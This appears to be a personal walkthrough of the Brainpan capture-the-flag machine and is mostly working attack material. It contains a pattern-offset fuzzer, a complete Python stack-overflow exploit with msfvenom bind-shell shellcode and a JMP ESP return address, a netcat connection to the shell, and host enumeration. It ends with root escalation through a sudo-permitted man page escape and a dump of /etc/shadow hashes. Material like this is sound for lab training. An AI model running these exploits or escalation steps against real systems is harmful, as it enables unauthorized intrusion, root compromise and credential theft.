# Transfer brainpan.exe to a Windows XP machine for debugging using OllyGDB or Immunity Debugger. Find which bytes overwrite EIP, find suitable JMP ESP address. Use msfvenom to create bind shell for Linux using the brainpan IP. Create working buffer overflow exploit (see below).


# GENERATE UNIQUE BUFFER
msf exploit(ms06_040_netapi) > ruby pattern_create.rb 1024
[*] exec: ruby pattern_create.rb 1024
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B


#!/usr/bin/python
#Brainpan.exe fuzzer by 1N3 - 20131122


import socket

target = "192.168.1.119"

# 1024 bit unique string
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B"

print "Fuzzing port 9999 with " +str(len(buffer))
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((target,9999))
s.recv(1024)
print "Sending evil buffer..." + buffer
s.send(buffer)
s.close()


root@bt:/mnt/sdb/nonxero/scripts/fuzzers# ./brainpan_fuzz.py
Fuzzing port 9999 with 1024
Sending evil buffer...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B
root@bt:/mnt/sdb/nonxero/scripts/fuzzers# 







msf exploit(ms06_040_netapi) > ruby pattern_offset.rb 35724134
[*] exec: ruby pattern_offset.rb 35724134

[*] Exact match at offset 524  
* This means from 524-528 bytes, EIP is overwritten... 

# CONSTRUCT OUR SHELLCODE...
msfvenom -p linux/x86/shell_bind_tcp LHOST=192.168.1.132 LPORT=4444 -b "x00" -e x86/shikata_ga_nai
[*] x86/shikata_ga_nai succeeded with size 105 (iteration=1)
buf =
"\xda\xcd\xd9\x74\x24\xf4\xbf\x7d\x7b\x06\xd9\x5d\x33\xc9" +
"\xb1\x14\x83\xed\xfc\x31\x7d\x15\x03\x7d\x15\x9f\x8e\x37" +
"\x02\xa8\x92\x6b\xf7\x05\x3f\x8e\x7e\x48\x0f\xe8\x4d\x0a" +
"\x2b\xab\x1f\x62\xce\x53\xb1\x2e\xa4\x43\xe0\x9e\xb1\x85" +
"\x68\x78\x9a\x88\xed\x0d\x5b\x17\x5d\x09\xec\x71\x6c\x91" +
"\x4f\xce\x08\x5c\xcf\xbd\x8c\x34\xef\x99\xe3\x48\x46\x63" +
"\x04\x20\x76\xbc\x87\xd8\xe0\xed\x05\x71\x9f\x78\x2a\xd1" +
"\x0c\xf2\x4c\x61\xb9\xc9\x0f"


# CREATE THE EXPLOIT...
# brainpan_exploit.py by 1N3 - 20131121

#      `7MN.   `7MF'       
# __,    MMN.    M         
#`7MM    M YMb   M  pd""b. 
#  MM    M  `MN. M (O)  `8b
#  MM    M   `MM.M      ,89
#  MM    M     YMM    ""Yb.
#.JMML..JML.    YM       88
#                  (O)  .M'
#                   bmmmd' 
#                          
#
#!/usr/bin/python


import socket
import os
import subprocess


# vars
target = "192.168.1.132"
buffer1 = '\x41' * 520
ebp = '\x90' * 4
EIP = "\xf3\x12\x17\x31" #311712F3 JMP ESP brainpan.exe
command = "nc -vv 192.168.1.132 4444"


#shellcode bind shell port 4444 192.168.1.132
shellcode = ("\xd9\xea\xd9\x74\x24\xf4\xbb\xda\x05\x64\xb7\x5a\x29\xc9" +
"\xb1\x14\x31\x5a\x19\x03\x5a\x19\x83\xc2\x04\x38\xf0\x55" +
"\x6c\x4b\x18\xc6\xd1\xe0\xb5\xeb\x5c\xe7\xfa\x8a\x93\x67" +
"\xa1\x0c\x7e\x0f\x54\xb1\x6f\x93\x32\xa1\xde\x7b\x4a\x20" +
"\x8a\x1d\x14\x6e\xcb\x68\xe5\x74\x7f\x6e\x56\x12\xb2\xee" +
"\xd5\x6b\x2a\x23\x59\x18\xea\xd1\x65\x47\xc0\xa5\xd3\x0e" +
"\x22\xcd\xcc\xdf\xa1\x65\x7b\x0f\x24\x1c\x15\xc6\x4b\x8e" +
"\xba\x51\x6a\x9e\x36\xaf\xed")


# NOOP sled
NOOP_sled = '\x90' * 104


# construct entire buffer - 1004 bytes
buffer = buffer1 + ebp + EIP + NOOP_sled + shellcode


print "**********************************************"
print "buffer1 length: " +str(len(buffer1))
print "EIP length: " +str(len(EIP))
print "shellcode length: " +str(len(shellcode))
print "NOOP_sled length: " +str(len(NOOP_sled))
print "Total buffer length: " +str(len(buffer))
print "**********************************************"
print "Fuzzing " + target + " on port 9999 with " +str(len(buffer)) + " bytes"
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
connect=s.connect((target,9999))
s.recv(1024)
print "Sending evil buffer..." + buffer
s.send(buffer)
print "Done..."
print "Connecting to bind shell..."
subprocess.call(command)
os.system(command)
print "Done..."
s.close()
exit


# EXPLOIT
root@bt:/scripts/fuzzers# ./brainpan_exploit.py
**********************************************
buffer1 length: 520
EIP length: 4
shellcode length: 105
NOOP_sled length: 104
Total buffer length: 737
**********************************************
Fuzzing 192.168.1.132 on port 9999 with 737 bytes
Sending evil buffer...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA����� 1�����������������������������������������������������������������������������������������������������������t$���d�Z)ɱ 1Z Z �� 8�UlK �����\����g�
                               ~T�o�2��{J � n�h�tnV ���k*#Y ��eG��"��ß¡e{$ �KQj�6�
Done...
Connecting to bind shell...

nc -vv 192.168.1.132 4444
whoami
puck
pwd
/home/puck/web


# DISTRO VERSION
cat /etc/release
Ubuntu 12.10

uname -a
Linux version 3.5.0-25-generic


# PROCESSES
ps -auxxx

 root       732     1  0 06:47 ?        00:00:00 /usr/sbin/winbindd -F
root       838   732  0 06:47 ?        00:00:00 /usr/sbin/winbindd -F
...
...
puck       910   909  0 06:47 ?        00:00:00 /bin/sh -c /home/puck/checksrv.sh
puck       911   910  0 06:47 ?        00:00:00 /bin/bash /home/puck/checksrv.sh
puck       926   911  0 06:47 ?        00:00:02 /usr/bin/python -m SimpleHTTPServer 10000
puck      1693     1  0 08:49 ?        00:00:00 /bin//sh
puck      1949     1  0 08:53 ?        00:00:00 /home/puck/web/bin/brainpan.exe
puck      1953     1  0 08:53 ?        00:00:00 /usr/bin/wineserver
puck      1959     1  0 08:53 ?        00:00:00 C:\windows\system32\services.exe
puck      1963     1  0 08:53 ?        00:00:00 C:\windows\system32\winedevice.exe MountMgr
puck      1972     1  0 08:53 ?        00:00:00 C:\windows\system32\plugplay.exe


# CRONTAB
cat /etc/crontab
# what can I do with this? file is owned by root and run by root but how to edit?
# m h  dom mon dow   command
* * * * * /home/puck/checksrv.sh


# SHOW LAST USERS TO LOGIN
#
last 
root     tty1                          Mon Mar  4 13:43 - 13:43  (00:00)
anansi   tty3                          Mon Mar  4 12:17 - 13:38  (01:20)
anansi   tty3                          Mon Mar  4 12:17 - 12:17  (00:00)
puck     tty3                          Mon Mar  4 11:30 - 12:17  (00:47)
puck     tty3                          Mon Mar  4 11:30 - 11:30  (00:00)
puck     tty2                          Mon Mar  4 11:07 - 13:38  (02:30)
puck     tty2                          Mon Mar  4 11:07 - 11:07  (00:00)
anansi   tty2                          Mon Mar  4 11:03 - 11:07  (00:04)
anansi   tty2                          Mon Mar  4 11:03 - 11:03  (00:00)
anansi   tty2                          Mon Mar  4 10:58 - 10:59  (00:01)
anansi   tty2                          Mon Mar  4 10:58 - 10:58  (00:00)
reynard  tty1                          Mon Mar  4 10:48 - 13:43  (02:54)
reynard  tty1                          Mon Mar  4 10:48 - 10:48  (00:00)


# USERS
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash


# SEARCH HOME DIRECTORY FILES
ls -lhaR /home/

/home/puck/.wine:
total 816K
drwxrwxr-x  4 puck puck 4.0K Nov 19 08:53 .
drwx------ 11 puck puck 4.0K Nov 19 08:51 ..
-rw-rw-r--  1 puck puck   11 Mar  4  2013 .update-timestamp
drwxrwxr-x  2 puck puck 4.0K Mar  4  2013 dosdevices
drwxrwxr-x  5 puck puck 4.0K Mar  4  2013 drive_c
-rw-rw-r--  1 puck puck 761K Nov 19 08:53 system.reg
-rw-rw-r--  1 puck puck  26K Nov 19 08:53 user.reg
-rw-rw-r--  1 puck puck 2.1K Mar  4  2013 userdef.reg


/home/puck/.wine/dosdevices:
total 8.0K
drwxrwxr-x 2 puck puck 4.0K Mar  4  2013 .
drwxrwxr-x 4 puck puck 4.0K Nov 19 08:53 ..
lrwxrwxrwx 1 puck puck   10 Mar  4  2013 c: -&gt; ../drive_c
lrwxrwxrwx 1 puck puck    1 Mar  4  2013 z: -&gt; /

/home/puck/.wine/drive_c:
total 20K
drwxrwxr-x  5 puck puck 4.0K Mar  4  2013 .
drwxrwxr-x  4 puck puck 4.0K Nov 19 08:53 ..
drwxrwxr-x  4 puck puck 4.0K Mar  4  2013 Program Files
drwxrwxr-x  4 puck puck 4.0K Mar  4  2013 users
drwxrwxr-x 13 puck puck 4.0K Mar  4  2013 windows

/home/puck/.wine/drive_c/Program Files:
total 16K
drwxrwxr-x 4 puck puck 4.0K Mar  4  2013 .
drwxrwxr-x 5 puck puck 4.0K Mar  4  2013 ..
drwxrwxr-x 2 puck puck 4.0K Mar  4  2013 Common Files
drwxrwxr-x 2 puck puck 4.0K Mar  4  2013 Internet Explorer

/home/puck/.wine/drive_c/Program Files/Common Files:

/home/puck/web:
total 816K
drwxrwxr-x  3 puck puck 4.0K Mar  4  2013 .
drwx------ 11 puck puck 4.0K Nov 19 08:51 ..
drwxrwxr-x  2 puck puck 4.0K Mar  4  2013 bin
-rw-rw-r--  1 puck puck  215 Mar  4  2013 index.html
-rw-------  1 puck puck 797K Mar  4  2013 soss-infographic-final.png

/home/puck/web/bin:
total 32K
drwxrwxr-x 2 puck puck 4.0K Mar  4  2013 .
drwxrwxr-x 3 puck puck 4.0K Mar  4  2013 ..
-rwxr-xr-x 1 puck puck  21K Mar  4  2013 brainpan.exe

# What development tools/languages are installed/supported?
which perl
which python
/usr/bin/perl
/usr/bin/python

# How can files be uploaded?
which wget
which nc
which netcat
which scp
which ftp
/usr/bin/wget
/bin/nc
/bin/netcat
/usr/bin/scp
/usr/bin/ftp

# RUNNING PORTS/SERVICES
# Both services running as user 'puck'... not sure that will help me get root....

lsof -i:9999
COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
brainpan. 1949 puck   10u  IPv4  26008      0t0  TCP *:9999 (LISTEN)
brainpan. 1949 puck   11u  IPv4  26008      0t0  TCP *:9999 (LISTEN)
wineserve 1953 puck   27u  IPv4  26008      0t0  TCP *:9999 (LISTEN)

lsof -i:10000
COMMAND PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
python  926 puck    3u  IPv4   8661      0t0  TCP *:webmin (LISTEN)

# RUNNING SERVICES LOCALLY
netstat -luntp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN      1756/brainpan.exe
tcp        0      0 0.0.0.0:10000           0.0.0.0:*               LISTEN      924/python     
udp        0      0 0.0.0.0:39859           0.0.0.0:*                           -              
udp        0      0 0.0.0.0:68              0.0.0.0:*                           - what's this port do?              
udp6       0      0 :::22091                :::*     


# BREAK OUT OF NETCAT SHELL TO BASH SHELL
python -c 'import pty;pty.spawn("/bin/bash")'
puck@brainpan:/home/puck/privesc$ ls
ls
allfiles.tar.gz    linux_gather_files.sh  linux_privesc_check
linux_checksec.sh  linux_priv_esc.sh      out
puck@brainpan:/home/puck/privesc$  

# CHECK SUDO COMMANDS AVAILABLE
puck@brainpan:/home/puck$ sudo -l
sudo -l
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin


User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util man ls
sudo /home/anansi/bin/anansi_util man ls
'unknown': unknown terminal type.

#  RUN SUDO COMMAND TO ENTER MAN PAGES
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual man

MAN(1)                        Manual pager utils                        MAN(1)


NAME
       man - an interface to the on-line reference manuals


SYNOPSIS
       man  [-C  file]  [-d]  [-D]  [--warnings[=warnings]]  [-R encoding] [-L
       locale] [-m system[,...]] [-M path] [-S list]  [-e  extension]  [-i|-I]
       [--regex|--wildcard]   [--names-only]  [-a]  [-u]  [--no-subpages]  [-P
       pager] [-r prompt] [-7] [-E encoding] [--no-hyphenation] [--no-justifi‐
       cation]  [-p  string]  [-t]  [-T[device]]  [-H[browser]] [-X[dpi]] [-Z]
       [[section] page ...] ...
       man -k [apropos options] regexp ...
       man -K [-w|-W] [-S list] [-i|-I] [--regex] [section] term ...
       man -f [whatis options] page ...
       man -l [-C file] [-d] [-D] [--warnings[=warnings]]  [-R  encoding]  [-L
       locale]  [-P  pager]  [-r  prompt]  [-7] [-E encoding] [-p string] [-t]
       [-T[device]] [-H[browser]] [-X[dpi]] [-Z] file ...
       man -w|-W [-C file] [-d] [-D] page ...
       man -c [-C file] [-d] [-D] page ...
       man [-hV]


DESCRIPTION
 Manual page man(1) line 1 (press h for help or q to quit)
DESCRIPTION
       man is the system's manual pager. Each page argument given  to  man  is
 Manual page man(1) line 2 (press h for help or q to quit)!/bin/bash


# TYPE !/bin/bash TO EXECUTE COMMANDS WITHIN MAN PAGE (WHICH WILL RUN AS "ROOT")
!/bin/bash

root@brainpan:/usr/share/man# whoami
whoami
root
root@brainpan:/usr/share/man#

# GATHER /etc/shadow file
root@brainpan:/usr/share/man# cat /etc/shadow
cat /etc/shadow
root:$6$m20VT7lw$172.XYFP3mb9Fbp/IgxPQJJKDgdOhg34jZD5sxVMIx3dKq.DBwv.mw3HgCmRd0QcN4TCzaUtmx4C5DvZaDioh0:15768:0:99999:7:::
daemon:*:15768:0:99999:7:::
bin:*:15768:0:99999:7:::
sys:*:15768:0:99999:7:::
sync:*:15768:0:99999:7:::
games:*:15768:0:99999:7:::
man:*:15768:0:99999:7:::
lp:*:15768:0:99999:7:::
mail:*:15768:0:99999:7:::
news:*:15768:0:99999:7:::
uucp:*:15768:0:99999:7:::
proxy:*:15768:0:99999:7:::
www-data:*:15768:0:99999:7:::
backup:*:15768:0:99999:7:::
list:*:15768:0:99999:7:::
irc:*:15768:0:99999:7:::
gnats:*:15768:0:99999:7:::
nobody:*:15768:0:99999:7:::
libuuid:!:15768:0:99999:7:::
syslog:*:15768:0:99999:7:::
messagebus:*:15768:0:99999:7:::
reynard:$6$h54J.qxd$yL5md3J4dONwNl.36iA.mkcabQqRMmeZ0VFKxIVpXeNpfK.mvmYpYsx8W0Xq02zH8bqo2K.mkQzz55U2H5kUh1:15768:0:99999:7:::
anansi:$6$hblZftkV$vmZoctRs1nmcdQCk5gjlmcLUb18xvJa3efaU6cpw9hoOXC/kHupYqQ2qz5O.ekVE.SwMfvRnf.QcB1lyDGIPE1:15768:0:99999:7:::
puck:$6$A/mZxJX0$Zmgb3T6SAq.FxO1gEmbIcBF9Oi7q2eAi0TMMqOhg0pjdgDjBr0p2NBpIRqs4OIEZB4op6ueK888lhO7gc.27g1:15768:0:99999:7:::